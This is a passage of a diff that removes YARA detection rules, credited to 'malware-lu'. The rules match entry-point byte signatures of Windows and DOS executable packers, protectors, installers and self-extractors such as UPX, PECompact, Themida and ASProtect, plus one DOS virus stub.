-		$a0 = { EB 04 ?? ?? ?? ?? E8 2A 00 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 26 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 02 ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? 8B 00 EB 02 ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 01 ?? EB 01 ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 04 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PrivateEXEProtector20SetiSoft
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 89 ?? ?? 38 00 00 00 8B ?? 00 00 00 00 81 ?? ?? ?? ?? ?? 89 ?? 00 00 00 00 81 ?? 04 00 00 00 81 ?? 04 00 00 00 81 ?? 00 00 00 00 0F 85 D6 FF FF FF }
-
-condition:
-		$a0
-}
-	
-	
-rule NTkrnlSecureSuite01015DLLNTkrnlSoftware
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 00 00 00 00 00 00 00 00 00 00 00 00 34 10 00 00 28 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 8B 44 24 04 05 ?? ?? ?? ?? 50 E8 01 00 00 00 C3 C3 }
-
-condition:
-		$a0
-}
-	
-	
-rule UPXHiTv001DJSiba
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 94 BC ?? ?? ?? 00 B9 ?? 00 00 00 80 34 0C ?? E2 FA 94 FF E0 61 }
-
-condition:
-		$a0
-}
-	
-	
-rule Vpackerttui
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 89 C6 C7 45 E0 01 00 00 00 F7 03 00 00 FF FF 75 18 0F B7 03 50 8B 45 D8 50 FF 55 F8 89 07 8B C3 E8 ?? FE FF FF 8B D8 EB 13 53 8B 45 D8 50 FF 55 F8 89 07 8B C3 E8 ?? FE FF FF 8B D8 83 C7 04 FF 45 E0 4E 75 C4 8B F3 83 3E 00 75 88 8B 45 E4 8B 40 10 03 45 DC 8B 55 14 83 C2 20 89 02 68 00 80 00 00 6A 00 8B 45 D4 50 FF 55 EC 8B 55 DC 8B 42 3C 03 45 DC 83 C0 04 8B D8 83 C3 14 8D 45 E0 50 6A 40 68 00 10 00 00 52 FF 55 E8 8D 43 60 }
-
-condition:
-		$a0
-}
-	
-	
-rule IProtect10FxlibdllmodebyFuXdas
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 33 2E 46 55 58 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 46 78 4C 69 62 2E 64 6C 6C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 60 E8 00 00 00 00 5D 81 ED 71 10 40 00 FF 74 24 20 E8 40 00 00 00 0B C0 74 2F 89 85 63 10 40 00 8D 85 3C 10 40 00 50 FF B5 63 10 40 00 E8 92 00 00 00 0B C0 74 13 89 85 5F 10 40 00 8D 85 49 10 40 00 50 FF 95 5F 10 40 00 8B 85 67 10 40 00 89 44 24 1C 61 FF E0 8B 7C 24 04 8D 85 00 10 40 00 50 64 FF 35 00 00 00 00 8D 85 53 10 40 00 89 20 89 68 04 8D 9D 0A 11 40 00 89 58 08 64 89 25 00 00 00 00 81 E7 00 00 FF FF 66 81 3F 4D 5A 75 0F 8B F7 03 76 3C 81 3E 50 45 00 00 75 02 EB 17 81 EF 00 00 01 00 81 FF 00 00 00 70 73 07 BF 00 00 F7 BF EB 02 EB D3 97 64 8F 05 00 00 00 00 83 C4 04 C2 04 00 8D 85 00 10 40 00 50 64 FF 35 00 00 00 00 8D 85 53 10 40 00 89 20 89 68 04 8D 9D 0A 11 40 00 89 58 08 64 89 25 00 00 00 00 8B 74 24 0C 66 81 3E 4D 5A 74 05 E9 8A 00 00 00 03 76 3C 81 3E 50 45 00 00 74 02 EB 7D 8B 7C 24 10 B9 96 00 00 00 32 C0 F2 AE 8B CF 2B 4C 24 10 8B 56 78 03 54 24 0C 8B 5A 20 03 5C 24 0C 33 C0 8B 3B 03 7C 24 0C 8B 74 24 10 51 F3 A6 75 05 83 C4 04 EB 0A 59 83 C3 04 40 3B 42 18 75 E2 3B 42 18 75 02 EB 35 8B 72 24 03 74 24 0C 52 BB 02 00 00 00 33 D2 F7 E3 5A 03 C6 33 C9 66 8B 08 8B 7A 1C 33 D2 BB 04 00 00 00 8B C1 F7 E3 03 44 24 0C 03 C7 8B 00 03 44 24 0C EB 02 33 C0 64 8F 05 00 00 00 00 83 C4 04 C2 08 00 E8 FA FD FF FF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner02DxPack10Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 8B FD 81 ED 90 90 90 90 2B B9 00 00 00 00 81 EF 90 90 90 90 83 BD 90 90 90 90 90 0F 84 00 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SecureEXE30ZipWorx
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 B8 00 00 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 00 00 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule eXPressorv12CGSoftLabs
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 45 78 50 72 2D 76 2E 31 2E 32 2E }
-	$a1 = { 55 8B EC 81 EC D4 01 00 00 53 56 57 EB 0C 45 78 50 72 2D 76 2E 31 2E 32 2E 2E B8 ?? ?? ?? ?? 2B 05 84 ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? 00 74 16 A1 ?? ?? ?? ?? 03 05 80 ?? ?? ?? 89 85 54 FE FF FF E9 ?? 07 00 00 C7 05 ?? ?? ?? ?? 01 00 00 00 68 04 }
-	$a2 = { 55 8B EC 81 EC D4 01 00 00 53 56 57 EB 0C 45 78 50 72 2D 76 2E 31 2E 32 2E 2E B8 ?? ?? ?? ?? 2B 05 84 ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? 00 74 16 A1 ?? ?? ?? ?? 03 05 80 ?? ?? ?? 89 85 54 FE FF FF E9 ?? 07 00 00 C7 05 ?? ?? ?? ?? 01 00 00 00 68 04 01 00 00 8D 85 F0 FE FF FF 50 6A 00 FF 15 }
-
-condition:
-		$a0 or $a1 at pe.entry_point or $a2 at pe.entry_point
-}
-	
-	
-rule NullsoftPIMPInstallSystemv13x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 81 EC ?? ?? 00 00 56 57 6A ?? BE ?? ?? ?? ?? 59 8D BD }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Enigmaprotector110111VladimirSukhov
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 83 ED 06 81 ED ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 9A 83 C4 04 EB 02 FF 35 60 E8 24 00 00 00 00 00 FF EB 02 CD 20 8B 44 24 0C 83 80 B8 00 00 00 03 31 }
-	$a1 = { 60 E8 00 00 00 00 5D 83 ED 06 81 ED ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 9A 83 C4 04 EB 02 FF 35 60 E8 24 00 00 00 00 00 FF EB 02 CD 20 8B 44 24 0C 83 80 B8 00 00 00 03 31 C0 C3 83 C0 08 EB 02 FF 15 89 C4 61 EB 2E EA EB 2B 83 04 24 03 EB 01 00 31 C0 EB 01 85 64 FF 30 EB 01 83 64 89 20 EB 02 CD 20 89 00 9A 64 8F 05 00 00 00 00 EB 02 C1 90 58 61 EB 01 3E EB ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 9A 83 C4 04 01 E8 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 9A 83 C4 04 05 F6 01 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 9A 83 C4 04 B9 3D 1A }
-
-condition:
-		$a0 or $a1
-}
-	
-	
-rule PECompactv140b5v140b6
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F A0 40 ?? 87 DD 8B 85 A6 A0 40 ?? 01 85 03 A0 40 ?? 66 C7 85 ?? A0 40 ?? 90 90 01 85 9E A0 40 ?? BB 8A 11 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VxExplosion1000
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 ?? ?? 5E 1E 06 50 81 ?? ?? ?? 56 FC B8 21 35 CD 21 2E ?? ?? ?? ?? 2E ?? ?? ?? ?? 26 ?? ?? ?? ?? ?? ?? 74 ?? 8C D8 48 8E D8 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PKZIPSFXv11198990
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { FC 2E 8C 0E ?? ?? A1 ?? ?? 8C CB 81 C3 ?? ?? 3B C3 72 ?? 2D ?? ?? 2D ?? ?? FA BC ?? ?? 8E D0 FB }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PEBundlev20b5v23
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB ?? ?? 40 ?? 87 DD 01 AD ?? ?? ?? ?? 01 AD }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PUNiSHERV15DemoFEUERRADER
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 04 83 A4 BC CE 60 EB 04 80 BC 04 11 E8 00 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule HACKSTOPv110v111
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B4 30 CD 21 86 E0 3D ?? ?? 73 ?? B4 2F CD 21 B0 ?? B4 4C CD 21 50 B8 ?? ?? 58 EB }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Obsidium1336ObsidiumSoftware
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 04 ?? ?? ?? ?? E8 28 00 00 00 EB 01 ?? ?? ?? ?? ?? ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 26 EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? C3 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 50 EB 01 ?? 33 C0 EB 02 ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 04 ?? ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 03 ?? ?? ?? 58 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 04 }
-
-condition:
-		$a0
-}
-	
-	
-rule DualseXeEncryptor10bDual
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 81 EC 00 05 00 00 E8 00 00 00 00 5D 81 ED 0E 00 00 00 8D 85 3A 04 00 00 89 28 33 FF 8D 85 80 03 00 00 8D 8D 3A 04 00 00 2B C8 8B 9D 8A 04 00 00 E8 24 02 00 00 8D 9D 58 03 00 00 8D B5 7F 03 00 00 46 80 3E 00 74 24 56 FF 95 58 05 00 00 46 80 3E 00 75 FA 46 80 3E 00 74 E7 50 56 50 FF 95 5C 05 00 00 89 03 58 83 C3 04 EB E3 8D 85 69 02 00 00 FF D0 8D 85 56 04 00 00 50 68 1F 00 02 00 6A 00 8D 85 7A 04 00 00 50 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule MarjinZEXEScramblerSEbyMarjinZ
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 A3 02 00 00 E9 35 FD FF FF FF 25 C8 20 00 10 6A 14 68 C0 21 00 10 E8 E4 01 00 00 FF 35 7C 33 00 10 8B 35 8C 20 00 10 FF D6 59 89 45 E4 83 F8 FF 75 0C FF 75 08 FF 15 88 20 00 10 59 EB 61 6A 08 E8 02 03 00 00 59 83 65 FC 00 FF 35 7C 33 00 10 FF D6 89 45 E4 FF 35 78 33 00 10 FF D6 89 45 E0 8D 45 E0 50 8D 45 E4 50 FF 75 08 E8 D1 02 00 00 89 45 DC FF 75 E4 8B 35 74 20 00 10 FF D6 A3 7C 33 00 10 FF 75 E0 FF D6 83 C4 1C A3 78 33 00 10 C7 45 FC FE FF FF FF E8 09 00 00 00 8B 45 DC E8 A0 01 00 00 C3 }
-
-condition:
-		$a0
-}
-	
-	
-rule nPack111502006BetaNEOx
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 83 3D ?? ?? ?? ?? ?? 75 05 E9 01 00 00 00 C3 E8 41 00 00 00 B8 ?? ?? ?? ?? 2B 05 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 5E 00 00 00 E8 E0 01 00 00 E8 EC 06 00 00 E8 F7 05 00 00 A1 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 01 05 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? C3 C3 56 57 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8B F8 68 ?? ?? ?? ?? 57 FF D6 68 ?? ?? ?? ?? 57 A3 ?? ?? ?? ?? FF D6 5F A3 ?? ?? ?? ?? 5E C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule DingBoysPElockPhantasmv15b3
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 55 57 56 52 51 53 9C FA E8 00 00 00 00 5D 81 ED 5B 53 40 00 B0 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ShellModify01pll621
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 98 66 41 00 68 3C 3D 41 00 64 A1 00 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner01MacromediaFlashProjector60Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 83 EC 44 56 FF 15 24 81 49 00 8B F0 8A 06 3C 22 75 1C 8A 46 01 46 3C 22 74 0C 84 C0 74 08 8A 46 01 46 3C 22 75 F4 80 3E 22 75 0F 46 EB 0C E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Packman0001Bubbasoft
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 0F 85 ?? FF FF FF 8D B3 ?? ?? ?? ?? EB 3D 8B 46 0C 03 C3 50 FF 55 00 56 8B 36 0B F6 75 02 8B F7 03 F3 03 FB EB 1B D1 C1 D1 E9 73 05 0F B7 C9 EB 05 03 CB 8D 49 02 50 51 50 FF 55 04 AB 58 83 C6 04 8B 0E 85 C9 75 DF 5E 83 C6 14 8B 7E 10 85 FF 75 BC 8D 8B 00 }
-
-condition:
-		$a0
-}
-	
-	
-rule aPackv098bDSESnotsaved
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 8C CB BA ?? ?? 03 DA FC 33 F6 33 FF 4B 8E DB 8D ?? ?? ?? 8E C0 B9 ?? ?? F3 A5 4A 75 }
-
-condition:
-		$a0
-}
-	
-	
-rule ASProtectvIfyouknowthisversionpostonPEiDboardh2
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? 00 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 DD 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
-
-condition:
-		$a0
-}
-	
-	
-rule Aluwainv809
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 8B EC 1E E8 ?? ?? 9D 5E }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule AntiDote12DLLDemoSISTeam
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 10 66 62 3A 43 2B 2B 48 4F 4F 4B 90 E9 08 32 90 90 90 90 90 90 90 90 90 90 80 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF EB 0B 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 31 C9 83 E8 03 72 0D C1 E0 08 8A 06 46 83 F0 FF 74 74 89 C5 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 75 20 41 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 83 C1 02 81 FD 00 F3 FF FF 83 D1 01 8D 14 2F 83 FD FC 76 0F 8A 02 42 88 07 47 49 75 F7 E9 63 FF FF FF 90 8B 02 83 C2 04 89 07 83 C7 04 83 E9 04 77 F1 01 CF E9 4C FF FF FF }
-
-condition:
-		$a0
-}
-	
-	
-rule MSLRHv032afakeMicrosoftVisualCemadicius
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 CA 37 41 00 68 06 38 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 64 8F 05 00 00 00 00 83 C4 0C 5D EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SoftwareCompressV12BGSoftwareProtectTechnologies
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 BE 00 00 00 60 8B 74 24 24 8B 7C 24 28 FC B2 80 33 DB A4 B3 02 E8 6D 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Themida1201OreansTechnologies
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 8B C5 8B D4 60 E8 00 00 00 00 5D 81 ED ?? ?? 35 09 89 95 ?? ?? 35 09 89 B5 ?? ?? 35 09 89 85 ?? ?? 35 09 83 BD ?? ?? 35 09 00 74 0C 8B E8 8B E2 B8 01 00 00 00 C2 0C 00 8B 44 24 24 89 85 ?? ?? 35 09 6A 45 E8 A3 00 00 00 68 9A 74 83 07 E8 DF 00 00 00 68 25 }
-
-condition:
-		$a0
-}
-	
-	
-rule PECompactv126b1v126b2
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 70 40 ?? 87 DD 8B 85 A6 70 40 ?? 01 85 03 70 40 ?? 66 C7 85 70 40 90 ?? 90 01 85 9E 70 40 BB ?? 05 0E }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Cruncherv10
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 2E ?? ?? ?? ?? 2E ?? ?? ?? B4 30 CD 21 3C 03 73 ?? BB ?? ?? 8E DB 8D ?? ?? ?? B4 09 CD 21 06 33 C0 50 CB }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule AntiDote1214SEDLLSISTeam
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 10 66 62 3A 43 2B 2B 48 4F 4F 4B 90 E9 08 32 90 90 90 90 90 90 90 90 90 90 80 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF EB 0B 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 ?? 75 ?? 8B 1E 83 EE FC 11 DB }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ASProtectSKE21xexeAlexeySolodovnikov
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
-
-condition:
-		$a0
-}
-	
-	
-rule DBPEv210DingBoy
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 20 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 9C 55 57 56 52 51 53 9C E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? EB 58 75 73 65 72 33 32 2E 64 6C 6C ?? 4D 65 73 73 61 67 65 42 6F 78 41 ?? 6B 65 72 6E 65 6C }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule NsPacKV37LiuXingPing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D ?? ?? ?? ?? ?? 80 39 01 0F ?? ?? ?? 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule tElock099tE
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 5E DF FF FF 00 00 00 ?? ?? ?? ?? E5 ?? ?? 00 00 00 00 00 00 00 00 00 05 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule WinZipSelfExtractor22personaleditionWinZipComputing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 53 FF 15 58 70 40 00 B3 22 38 18 74 03 80 C3 FE 40 33 D2 8A 08 3A CA 74 10 3A CB 74 07 40 8A 08 3A CA 75 F5 38 10 74 01 40 52 50 52 52 FF 15 5C 70 40 00 50 E8 15 FB FF FF 50 FF 15 8C 70 40 00 5B }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-rule ZipWorxSecureEXEv25ZipWORXTechnologiesLLC
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 B8 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 53 65 63 75 72 65 45 58 45 20 45 78 65 63 75 74 61 62 6C 65 20 46 69 6C 65 20 50 72 6F 74 65 63 74 6F 72 0D 0A 43 6F 70 79 72 69 67 68 74 28 63 29 20 32 30 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RLPackFullEdition117iBoxaPLibAp0x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8D B5 79 29 00 00 8D 9D 2C 03 00 00 33 FF ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? EB 0F FF 74 37 04 FF 34 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Alloyv1x2000
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 07 20 40 ?? 87 DD 6A 04 68 ?? 10 ?? ?? 68 ?? 02 ?? ?? 6A ?? FF 95 46 23 40 ?? 0B }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FreeJoiner153Stubengine171GlOFF
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 02 FD FF FF 6A 00 E8 0D 00 00 00 CC FF 25 80 10 40 00 FF 25 84 10 40 00 FF 25 88 10 40 00 FF 25 8C 10 40 00 FF 25 90 10 40 00 FF 25 94 10 40 00 FF 25 98 10 40 00 FF 25 9C 10 40 00 FF 25 A0 10 40 00 FF 25 A8 10 40 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner02MicrosoftVisualC70DLLAnorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8D 6C 01 00 81 EC 00 00 00 00 8B 45 90 83 F8 01 56 0F 84 00 00 00 00 85 C0 0F 84 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EYouDiDaiYueHeiFengGao
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 56 57 0F 31 8B D8 0F 31 8B D0 2B D3 C1 EA 10 B8 ?? ?? ?? ?? 0F 6E C0 B8 ?? ?? ?? ?? 0F 6E C8 0F F5 C1 0F 7E C0 0F 77 03 C2 ?? ?? ?? ?? ?? FF E0 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EXECryptorV21Xsoftcompletecom
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 83 C6 14 8B 55 FC E9 ?? FF FF FF }
-	$a1 = { E9 ?? ?? ?? ?? 66 9C 60 50 8D 88 ?? ?? ?? ?? 8D 90 04 16 ?? ?? 8B DC 8B E1 }
-
-condition:
-		$a0 or $a1 at pe.entry_point
-}
-	
-	
-rule PCShrinkerv045
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BD ?? ?? ?? ?? 01 AD E3 38 40 ?? FF B5 DF 38 40 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule yodasProtectorV1033AshkbizDanehkar
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 03 00 00 00 EB 01 ?? BB 55 00 00 00 E8 03 00 00 00 EB 01 ?? E8 8E 00 00 00 E8 03 00 00 00 EB 01 ?? E8 81 00 00 00 E8 03 00 00 00 EB 01 ?? E8 B7 00 00 00 E8 03 00 00 00 EB 01 ?? E8 AA 00 00 00 E8 03 00 00 00 EB 01 ?? 83 FB 55 E8 03 00 00 00 EB 01 ?? 75 2D E8 03 00 00 00 EB 01 ?? 60 E8 00 00 00 00 5D 81 ED 07 E2 40 00 8B D5 81 C2 56 E2 40 00 52 E8 01 00 00 00 C3 C3 E8 03 00 00 00 EB 01 ?? E8 0E 00 00 00 E8 D1 FF FF FF C3 E8 03 00 00 00 EB 01 ?? 33 C0 64 FF 30 64 89 20 CC C3 E8 03 00 00 00 EB 01 ?? 33 C0 64 FF 30 64 89 20 4B CC C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SoftSentryv211
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 EC ?? 53 56 57 E9 50 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FSGv120EngdulekxtBorlandDelphiBorlandC
-{
-      meta:
-		author="malware-lu"
-strings:
